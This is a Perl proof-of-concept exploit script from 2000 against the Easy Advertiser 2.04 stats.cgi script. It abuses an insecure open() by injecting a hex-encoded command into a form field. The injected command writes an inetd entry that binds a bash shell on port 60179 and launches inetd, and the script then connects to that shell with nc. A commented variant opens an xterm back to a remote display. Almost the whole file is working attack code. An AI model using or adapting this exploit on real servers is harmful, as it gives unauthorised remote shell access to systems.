#!/usr/bin/perl -w

## Easy Advertiser v. 2.04 / (c) 1999 Smokey 
## Communications, LLC - PoC exploit.
## http://www.smokey.net/
##
## Exploits an insecure open() in that stats.cgi
## script. The exploit will attempt to bind a 
## shell with nobody/99 privileges on port 60179
## This will not work if the $target does not 
## have inetd installed. I have included the code
## to simply spawn an xterm as well.
##
## [ Wed Oct  4 16:53:05 CEST 2000 ]
##
## http://teleh0r.cjb.net/ || teleh0r@doglover.com

use strict; use Socket;

if (@ARGV < 1) {
    print("Usage: $0 <target>\n");
    exit(1);
}

my($target, $length, $cgicode, $agent, 
   $sploit, $iaddr, $paddr, $proto);

$target = $ARGV[0];

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/stats.cgi\n");

$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

$cgicode =

# echo 'fido stream tcp nowait nobody /bin/bash bash -i' > /tmp/.hass;
# /usr/sbin/inetd /tmp/.hass

# stats.cgi port binding cgicode (port fido/60179)
"\x73\x74\x61\x74\x73\x3d\x73\x74\x61\x74\x73\x26\x6e".
"\x61\x6d\x65\x3d\x74\x65\x6c\x65\x68\x30\x72\x26\x61".
"\x64\x73\x6e\x3d\x7c\x65\x63\x68\x6f\x2b\x27\x66\x69".
"\x64\x6f\x2b\x73\x74\x72\x65\x61\x6d\x2b\x74\x63\x70".
"\x2b\x6e\x6f\x77\x61\x69\x74\x2b\x6e\x6f\x62\x6f\x64".
"\x79\x2b\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x2b\x62".
"\x61\x73\x68\x2b\x2d\x69\x27\x2b\x3e\x2b\x2f\x74\x6d".
"\x70\x2f\x2e\x68\x61\x73\x73\x3b\x2f\x75\x73\x72\x2f".
"\x73\x62\x69\x6e\x2f\x69\x6e\x65\x74\x64\x2b\x2f\x74".
"\x6d\x70\x2f\x2e\x68\x61\x73\x73\x7c\x26\x6c\x6f\x67".
"\x69\x6e\x3d\x4c\x6f\x67\x69\x6e";

# To spawn an xterm instead:
# "stats=stats&name=teleh0r&adsn=%7Cxterm+-ut+-display+".
# "target.com "%3A0%7C&login=Login";

$sploit =
"POST /cgi-bin/stats.cgi HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: 168

$cgicode";

$iaddr = inet_aton($target)                     || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr)                || die("Error: $!\n");
$proto = getprotobyname('tcp')                  || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto)    || die("Error: $!\n");
connect(SOCKET, $paddr)                         || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0)               || die("Error: $!\n");
close(SOCKET);

print("\nSleeping 5 seconds - waiting for the shell ...\n\n");
sleep(5); system("nc -w 10 $target 60179"); exit(0);
#                   www.hack.co.za     [12 October 2000]#